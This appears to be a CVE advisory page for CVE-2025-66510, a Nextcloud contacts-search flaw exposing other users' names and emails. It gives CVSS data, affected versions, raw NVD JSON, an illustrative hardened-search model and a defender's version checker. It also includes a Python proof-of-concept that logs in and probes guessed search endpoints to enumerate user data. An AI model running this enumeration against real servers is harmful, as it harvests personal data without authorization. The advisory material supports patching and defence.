Security Vulnerability Report
CVE-2025-66510
CVSS 4.5 MEDIUM (CNA) / 4.9 MEDIUM (NVD)

Published: 2025-12-05 17:16:05
Last Modified: 2025-12-10 16:12:34

Description

Nextcloud Server is a self-hosted personal cloud system. In Nextcloud Server prior to 31.0.10 and 32.0.1, and in Nextcloud Enterprise Server prior to 28.0.14.11, 29.0.16.8, 30.0.17.3, and 31.0.10, the contacts search allowed personal data of other users (emails, names, identifiers) to be retrieved without proper access control. This allows any authenticated user to retrieve information about accounts that are neither related to them nor added as contacts.
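The failure mode the description points at is an authorization check missing from a search path: authentication gates the request, but nothing narrows which accounts the caller is allowed to match against, so a broad or empty term walks the whole user table. The Python model below is an added illustration, not Nextcloud code and not the patch referenced in the NVD record; the Account/Directory data model, the enumerate_all flag and the "related = already a contact or shares a group" rule are assumptions chosen to mirror the description's wording. It puts the pre-fix shape beside a hardened search that filters the candidate set before matching and refuses empty terms.

```python
"""Toy model of the bug class behind CVE-2025-66510 (CWE-359): a contacts search
that matches the caller's term against every account on the instance, versus one
that narrows the candidate set to accounts the caller is entitled to see before
matching. Added example; the data model, the policy flag and the visibility rule
are assumptions and do not reproduce Nextcloud's contacts manager or its patch."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Account:
    uid: str
    display_name: str
    email: str
    groups: frozenset


@dataclass
class Directory:
    accounts: dict       # uid -> Account, every user on the instance
    address_books: dict  # uid -> set of uids that user has saved as contacts


def _matches(account, term):
    """Case-insensitive substring match on the fields a search box would hit."""
    t = term.lower()
    return any(t in f.lower() for f in (account.uid, account.display_name, account.email))


def _public_view(account):
    return {"uid": account.uid, "display_name": account.display_name, "email": account.email}


def search_vulnerable(directory, requester, term):
    """Pre-fix shape: authentication is the only gate. Any logged-in user can
    match against the whole user table, and an empty term returns everyone."""
    if requester not in directory.accounts:
        raise PermissionError("login required")
    hits = [a for a in directory.accounts.values()
            if a.uid != requester and _matches(a, term)]
    return [_public_view(a) for a in sorted(hits, key=lambda a: a.uid)]


def search_hardened(directory, requester, term, enumerate_all=False):
    """Authorization is applied to the candidate set before matching: an account
    is a candidate only if the requester already has it as a contact or shares a
    group with it, unless the admin has explicitly enabled instance-wide
    enumeration (enumerate_all, an assumed policy flag). Empty terms return nothing."""
    if requester not in directory.accounts:
        raise PermissionError("login required")
    if not term.strip():
        return []
    me = directory.accounts[requester]
    my_contacts = directory.address_books.get(requester, set())
    hits = []
    for a in directory.accounts.values():
        if a.uid == requester:
            continue
        related = a.uid in my_contacts or bool(me.groups & a.groups)
        if (related or enumerate_all) and _matches(a, term):
            hits.append(a)
    return [_public_view(a) for a in sorted(hits, key=lambda a: a.uid)]


# Constructed sample instance for the example (not real data).
DIRECTORY = Directory(
    accounts={
        "alice": Account("alice", "Alice Adams", "alice@example.com", frozenset({"eng"})),
        "bob":   Account("bob",   "Bob Baker",   "bob@example.com",   frozenset({"eng"})),
        "carol": Account("carol", "Carol Cruz",  "carol@example.com", frozenset({"sales"})),
        "dave":  Account("dave",  "Dave Diaz",   "dave@example.com",  frozenset()),
    },
    address_books={"alice": {"dave"}},
)

if __name__ == "__main__":
    # alice shares a group with bob and has dave as a contact; carol is unrelated.
    print([r["uid"] for r in search_vulnerable(DIRECTORY, "alice", "")])      # everyone
    print([r["uid"] for r in search_vulnerable(DIRECTORY, "alice", "cruz")])  # carol leaks
    print([r["uid"] for r in search_hardened(DIRECTORY, "alice", "a")])       # bob, dave only
```

The point of the hardened version is where the filter sits: it decides the candidate set from the requester's relationships first and only then applies the term, so a substring such as "cruz" cannot be used to confirm that an unrelated account exists, and the empty-term probe the PoC below tries returns nothing rather than the whole directory.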

CVSS Details

Two CVSS v3.1 assessments are on record for this CVE; the page header carries the CNA's 4.5.

Secondary (CNA-supplied)
CVSS Score: 4.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N
Exploitability 0.9, Impact 3.6

Primary (NVD)
CVSS Score: 4.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
Exploitability 1.2, Impact 3.6

The two vectors differ only in User Interaction (CNA: Required, NVD: None). Both rate Privileges Required as High even though the description needs only an authenticated account, and both score the impact as Confidentiality High with no Integrity or Availability impact.

Weakness: CWE-359 (Exposure of Private Personal Information to an Unauthorized Actor)

Configurations (Affected Products)

All six CPE matches in the NVD record are flagged VULNERABLE. The "enterprise" software edition is Nextcloud Enterprise Server; "-" is the community Nextcloud Server.

CPE criteria                                                    | from (incl.) | before (excl.)
cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*  | 28.0.0       | 28.0.14.11
cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*  | 29.0.0       | 29.0.16.8
cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*  | 30.0.0       | 30.0.17.3
cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:-:*:*:*           | 31.0.0       | 31.0.10
cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*  | 31.0.0       | 31.0.10
cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:-:*:*:*           | 32.0.0       | 32.0.1

Nextcloud Server < 31.0.10
Nextcloud Server < 32.0.1
Nextcloud Enterprise Server < 28.0.14.11
Nextcloud Enterprise Server < 29.0.16.8
Nextcloud Enterprise Server < 30.0.17.3
Nextcloud Enterprise Server < 31.0.10
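To turn the ranges above into a check an operator can actually run, here is an added Python example (not from the advisory, NVD or Nextcloud). It encodes the cpeMatch ranges of the NVD record, compares dotted versions component-wise so that 31.0.9.2 sorts below 31.0.10, and reads the running version from a status.php body. The status.php sample is constructed; versionstring is the field Nextcloud's status.php exposes; the edition (community or enterprise) is passed by the caller, since the example assumes it cannot be derived reliably from status.php.

```python
"""Decide whether a Nextcloud version falls inside the NVD affected ranges for
CVE-2025-66510. Added example; the ranges are copied from the Configurations
section of this report, and the status.php body used as input is constructed."""
import json
import re

# (edition, versionStartIncluding, versionEndExcluding), one tuple per cpeMatch
# entry in the NVD record. "community" stands for the CPE's "-" software edition.
AFFECTED_RANGES = [
    ("enterprise", "28.0.0", "28.0.14.11"),
    ("enterprise", "29.0.0", "29.0.16.8"),
    ("enterprise", "30.0.0", "30.0.17.3"),
    ("community", "31.0.0", "31.0.10"),
    ("enterprise", "31.0.0", "31.0.10"),
    ("community", "32.0.0", "32.0.1"),
]


def parse_version(text):
    """'31.0.9.2' -> (31, 0, 9, 2). Each component contributes its leading
    digits; parsing stops at a component without any (so '32.0.1rc1' -> (32, 0, 1))."""
    parts = []
    for piece in text.strip().split("."):
        match = re.match(r"\d+", piece)
        if not match:
            break
        parts.append(int(match.group()))
    return tuple(parts)


def compare_versions(a, b):
    """Three-way compare of dotted versions. Shorter tuples are zero-padded,
    so '31.0.10' == '31.0.10.0' and '31.0.9.2' < '31.0.10'."""
    va, vb = parse_version(a), parse_version(b)
    width = max(len(va), len(vb))
    va += (0,) * (width - len(va))
    vb += (0,) * (width - len(vb))
    return (va > vb) - (va < vb)


def assess(version, edition):
    """Place `version` of the given edition against the NVD ranges.
    status: affected   - inside a listed vulnerable range
            fixed      - a range exists for this edition and major branch and the
                         version is at or past its end
            not_listed - NVD lists no range for this edition and branch (e.g.
                         community 28.x-30.x); do not read this as safe."""
    major = parse_version(version)[0]
    for ed, start, end in AFFECTED_RANGES:
        if ed != edition:
            continue
        if compare_versions(version, start) >= 0 and compare_versions(version, end) < 0:
            return {"version": version, "edition": edition, "status": "affected", "fixed_in": end}
    branch = [end for ed, start, end in AFFECTED_RANGES
              if ed == edition and parse_version(start)[0] == major]
    if branch:
        return {"version": version, "edition": edition, "status": "fixed", "fixed_in": branch[0]}
    return {"version": version, "edition": edition, "status": "not_listed", "fixed_in": None}


def assess_status_json(status_text, edition):
    """Feed the JSON body of GET /status.php to assess(), using its 'versionstring'."""
    data = json.loads(status_text)
    return assess(data["versionstring"], edition)


# Constructed sample of a status.php body (not captured from a real host).
SAMPLE_STATUS = (
    '{"installed":true,"maintenance":false,"needsDbUpgrade":false,'
    '"version":"31.0.9.2","versionstring":"31.0.9","edition":"",'
    '"productname":"Nextcloud","extendedSupport":false}'
)

if __name__ == "__main__":
    print(assess_status_json(SAMPLE_STATUS, "community"))
    print(assess("30.0.17.2", "enterprise"))
    print(assess("30.0.17.2", "community"))
```

The not_listed status is deliberate: community 28.x through 30.x have no fix version in the NVD record, and an instance on one of those branches is not cleared by this check; it needs to move to a branch that has a listed fix.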

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import html
import json
import re

import requests

# CVE-2025-66510 PoC - Nextcloud Contact Search Information Disclosure
# Target: Nextcloud Server < 31.0.10, < 32.0.1
# Author: Security Researcher

TARGET_URL = "https://vulnerable-nextcloud-server.com"
USERNAME = "attacker@example.com"   # user id or e-mail of any valid low-privileged account
PASSWORD = "attacker_password"


def authenticate():
    """Authenticate to Nextcloud and return a session holding the login cookie."""
    session = requests.Session()
    login_url = f"{TARGET_URL}/index.php/login"

    # The login form is CSRF-protected: load the page first and pull the
    # requesttoken out of the <head data-requesttoken="..."> attribute.
    response = session.get(login_url, timeout=10)
    match = re.search(r'data-requesttoken="([^"]+)"', response.text)
    if not match:
        return None
    login_data = {
        "user": USERNAME,
        "password": PASSWORD,
        "requesttoken": html.unescape(match.group(1)),
    }
    response = session.post(login_url, data=login_data, allow_redirects=True, timeout=10)
    # A rejected login re-renders the login page with HTTP 200, so check the
    # final URL rather than the status code alone.
    if response.status_code == 200 and "/login" not in response.url:
        return session
    return None


def exploit_contact_search(session):
    """Query the contact search with broad terms and collect whatever comes back."""
    # Candidate search routes. The advisory does not name the vulnerable route,
    # and it may vary between Nextcloud versions, so adjust these to the target.
    search_endpoints = [
        "/index.php/apps/dav/api_v2/direct_search/contacts",
        "/remote.php/dav/contacts/search",
        "/index.php/settings/users/users",
    ]
    # Broad queries intended to enumerate users.
    search_payloads = [
        {"search": ""},   # empty search might return all contacts
        {"term": "a"},    # common prefix to enumerate users
        {"query": "*"},
    ]

    results = []
    for endpoint in search_endpoints:
        for payload in search_payloads:
            try:
                response = session.get(f"{TARGET_URL}{endpoint}", params=payload, timeout=10)
                if response.status_code == 200:
                    data = response.json()   # HTML or other non-JSON bodies raise and are skipped
                    if data:
                        results.append({"endpoint": endpoint, "payload": payload, "data": data})
            except (requests.RequestException, ValueError):
                continue
    return results


def main():
    print("[*] CVE-2025-66510 PoC - Nextcloud Contact Search Info Disclosure")
    print(f"[*] Target: {TARGET_URL}")

    # Step 1: Authenticate
    print("\n[1] Authenticating to Nextcloud...")
    session = authenticate()
    if not session:
        print("[-] Authentication failed")
        return
    print("[+] Authentication successful")

    # Step 2: Exploit contact search
    print("\n[2] Exploiting contact search vulnerability...")
    results = exploit_contact_search(session)
    if results:
        print(f"[+] Found {len(results)} potential information leaks:")
        for i, result in enumerate(results, 1):
            print(f"\n--- Result {i} ---")
            print(f"Endpoint: {result['endpoint']}")
            print(f"Payload: {result['payload']}")
            print(f"Data: {json.dumps(result['data'], indent=2)}")
    else:
        print("[-] No information leaks found (target may be patched)")


if __name__ == "__main__":
    main()

References

https://github.com/nextcloud/security-advisories/security/advisories/GHSA-495w-cqv6-wr59 (Vendor Advisory, Patch)
https://github.com/nextcloud/server/commit/e4866860cbf24a746eb8a125587262a4c8831c57 (Patch)
https://github.com/nextcloud/server/pull/55657 (Issue Tracking)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-66510",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-05T17:16:04.613",
    "lastModified": "2025-12-10T16:12:34.217",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Nextcloud Server is a self hosted personal cloud system. In Nextcloud Server prior to 31.0.10 and 32.0.1 and Nextcloud Enterprise Server prior to 28.0.14.11, 29.0.16.8, 30.0.17.3, and 31.0.10, contacts search allowed to retrieve personal data of other users (emails, names, identifiers) without proper access control. This allows an authenticated user to retrieve information about accounts that are not related or added as contacts."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N", "baseScore": 4.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"},
          "exploitabilityScore": 0.9,
          "impactScore": 3.6
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"},
          "exploitabilityScore": 1.2,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-359"}]}
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "28.0.0", "versionEndExcluding": "28.0.14.11", "matchCriteriaId": "B55EF258-E98A-43A9-B73C-AE62D448421D"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "29.0.0", "versionEndExcluding": "29.0.16.8", "matchCriteriaId": "7710228F-2984-4F9A-8360-0054E7E78687"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "30.0.0", "versionEndExcluding": "30.0.17.3", "matchCriteriaId": "9D119C97-0478-4CE4-8DAF-A72F69DC8C50"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:-:*:*:*", "versionStartIncluding": "31.0.0", "versionEndExcluding": "31.0.10", "matchCriteriaId": "2059C891-F256-482A-99BF-D912A1657419"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "31.0.0", "versionEndExcluding": "31.0.10", "matchCriteriaId": "64C21E45-22B8-49B2-B630-30448D89A4E9"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:-:*:*:*", "versionStartIncluding": "32.0.0", "versionEndExcluding": "32.0.1", "matchCriteriaId": "A75D466C-B154-480A-9D4F-8E9454147156"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-495w-cqv6-wr59", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]},
      {"url": "https://github.com/nextcloud/server/commit/e4866860cbf24a746eb8a125587262a4c8831c57", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/nextcloud/server/pull/55657", "source": "[email protected]", "tags": ["Issue Tracking"]}
    ]
  }
}